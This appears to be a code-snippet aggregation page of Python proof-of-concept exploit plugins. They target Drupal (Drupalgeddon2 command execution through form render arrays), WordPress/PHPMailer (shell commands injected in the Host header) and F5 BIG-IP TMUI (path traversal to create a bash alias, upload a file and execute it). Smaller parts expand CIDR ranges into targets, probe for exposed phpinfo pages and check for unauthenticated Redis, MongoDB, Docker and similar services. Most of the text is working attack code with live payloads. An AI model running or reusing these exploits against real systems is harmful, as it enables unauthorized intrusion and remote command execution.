Пример #1
0
    def init(self):

        info_msg = "[PLUGIN] try fetch targets from CIDR..."
        logger.info(info_msg)
        cidr_text = ""
        if "CIDR" in os.environ:
            cidr_text = os.environ.get("CIDR")
        elif conf.url:
            cidr_text = conf.url
            conf.url = ""
        else:
            cidr_text = input("Please input CIDR address:")
        count = 0
        try:
            network = ip_network(cidr_text, strict=False)
            for host in network.hosts():
                self.add_target(host.exploded)
                count += 1
        except ValueError:
            logger.error("[PLUGIN] error format from " + cidr_text)
        info_msg = "[PLUGIN] get {0} target(s) from CIDR".format(count)
        logger.info(info_msg)
Пример #2
0
    def _attack(self):
        result = {}
        cmd = self.get_option("command")
        url = self.url.rstrip(
            '/'
        ) + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        payload = {
            'form_id': 'user_register_form',
            '_drupal_ajax': '1',
            'mail[#post_render][]': 'exec',
            'mail[#type]': 'markup',
            'mail[#markup]': '{}'.format(cmd)
        }

        try:
            response = requests.post(url, data=payload)
            if response and response.status_code == 200:
                result['Stdout'] = json.loads(response.text)[0]['data']
        except Exception as ex:
            logger.error(str(ex))

        return self.parse_output(result)
Пример #3
0
    def _verify(self):
        result = {}
        flag = random_str(length=10)
        url = self.url.rstrip(
            '/') + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        payload = {
            'form_id': 'user_register_form',
            '_drupal_ajax': '1',
            'mail[#post_render][]': 'exec',
            'mail[#type]': 'markup',
            'mail[#markup]': 'echo "{0}";'.format(flag)
        }

        resp = requests.post(url, data=payload)
        try:
            if '"data":"{0}'.format(flag) in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Postdata'] = payload
        except Exception as ex:
            logger.error(str(ex))

        return self.parse_output(result)
Пример #4
0
    def _verify(self):
        result = {}
        filename = random_str(6) + '.txt'
        filename = filename.lower()
        url = urljoin(self.url, 'wp-login.php?action=lostpassword')
        cmd = '''{{run{{/bin/touch {abspathfilename}}}}}'''.format(
            abspathfilename=os.path.join(self.get_option('writePath'),
                                         filename))
        cmd = cmd.replace(' ', '${substr{10}{1}{$tod_log}}').replace(
            '/', '${substr{0}{1}{$spool_directory}}')
        # replace
        # ' ' -> '${substr{10}{1}{$tod_log}}'
        # '/' -> '${substr{0}{1}{$spool_directory}}'
        urlsp = urlsplit(url)
        payload = '{netloc}(any -froot@localhost -be ${cmd} null)'.format(
            netloc=urlsp.netloc.split(':')[0], cmd=cmd)
        # 该payload的Host字段不能出现端口信息,否则无法成功,也就是说只能打默认80端口
        headers = {
            'Host': payload,
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        data = {
            'wp-admin': 'Get+New+Password',
            'redirect_to': '',
            'user_login': self.get_option('username')
        }
        r = requests.post(url=url, headers=headers, data=data)
        resp = requests.get(url=urljoin(self.url, filename))
        try:
            if resp.status_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Postdata'] = payload
        except Exception as ex:
            logger.error(str(ex))

        return self.parse_output(result)
Пример #5
0
    def _verify(self):
        result = {}
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
        }
        phpinfoList = ['/phpinfo.php', '/1.php', '/test.php']

        for path in phpinfoList:
            vulurl = "{}{}".format(self.url.rstrip('/'), path)
            try:
                resp = requests.get(url=vulurl,
                                    headers=headers,
                                    timeout=3,
                                    verify=False)
                if "PHP Version" in resp.text and resp.status_code == 200:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['url'] = vulurl
                    return self.parse_attack(result)
            except Exception as e:
                logger.error("connect target '{} failed!'".format(vulurl))
                pass

        return self.parse_attack(result)
Пример #6
0
 def _verify(self):
     """verify mode"""
     result = {}
     pr = urlparse(self.url)
     ip = pr.hostname
     res_info = []
     try:
         res = self.redis(ip)
         res_info.append(res)
         res = self.mongodb(ip)
         res_info.append(res)
         res = self.memcached(ip)
         res_info.append(res)
         res = self.elasticsearch(ip)
         res_info.append(res)
         res = self.zookeeper(ip)
         res_info.append(res)
         res = self.ftp(ip)
         res_info.append(res)
         res = self.CouchDB(ip)
         res_info.append(res)
         res = self.docker(ip)
         res_info.append(res)
         res = self.Hadoop(ip)
         res_info.append(res)
         res_sring = ""
         for ri in res_info:
             if ri != False:
                 res_string = res_string + ";" + ri
         if res_string != "":
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = ip
             result['VerifyInfo']['Info'] = res_info
     except Exception as ex:
         logger.error(str(ex))
     return self.parse_output(result)
    def _verify(self):
        result = {}
        randstr = random_str()
        protocol, host, port, rpath = self.parse_url(self.url)
        url = protocol + "://" + str(host) + ":" + str(port)

        fileName = "/var/tmp/tdfgjkl"  # 写到目标的
        cmd = "id"  # // ==> \/\/

        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
        }

        def create_alias():  # 开启bash
            payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
            headers = {
                "User-Agent":
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
                "Accept":
                "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Connection": "close",
                "Upgrade-Insecure-Requests": "1",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            data = {"command": "create cli alias private list command bash"}
            req = requests.post(url + payload, headers=headers, data=data)
            if req.json()['error'] == "":
                return True

        def upload_script(fileName,
                          cmd):  # fileName ==> /tmp/ljkkasdv    任意文件上传
            payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
            headers = {
                "User-Agent":
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
                "Accept":
                "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Connection": "close",
                "Upgrade-Insecure-Requests": "1",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            data = {"fileName": fileName, "content": cmd}
            req = requests.post(url + payload, headers=headers, data=data)
            if req.status_code == 200:
                return True

        def upload_check(fileName, cmd):  # 任意文件读取
            payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={}".format(
                fileName)
            headers = {
                "User-Agent":
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
                "Accept":
                "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Connection": "close",
                "Upgrade-Insecure-Requests": "1"
            }
            req = requests.get(url + payload, headers=headers)
            if cmd.replace("/", "\\/") in req.text:
                logger.info("[+] Upload Success ! ==> {}".format(url +
                                                                 payload))
                return True

        def execute_script(fileName):  # if "uid" in
            payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
            headers = {
                "User-Agent":
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
                "Accept":
                "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Connection": "close",
                "Upgrade-Insecure-Requests": "1",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            data = {"command": "list {}".format(fileName)}
            for i in range(0, 10):  # 重复多次可能会成功,一般是4次
                req = requests.post(url + payload, headers=headers, data=data)
                if req.json()['error'] == "" and "uid" in req.text:
                    print(req.text)
                    logger.info("[+] Execute OK, Having a check ...")
                    return True

        def delete_alias():
            payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
            headers = {
                "User-Agent":
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
                "Accept":
                "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Connection": "close",
                "Upgrade-Insecure-Requests": "1",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            data = {"command": "delete cli alias private list"}
            req = requests.post(url + payload, headers=headers, data=data)
            if req.json()['error'] == "":
                return True

        try:
            delete_alias()  # 可能被别人别名了,第一步先尝试删除别名不然可能报错!!!

            if create_alias():
                if upload_script(fileName, cmd):
                    if upload_check(fileName, cmd):
                        if execute_script(fileName):
                            if delete_alias():
                                result['VerifyInfo'] = {}
                                result['VerifyInfo']['URL'] = url
                                result['VerifyInfo']['Port'] = str(port)
                                return self.parse_output(result)
        except Exception as ex:
            logger.error(ex)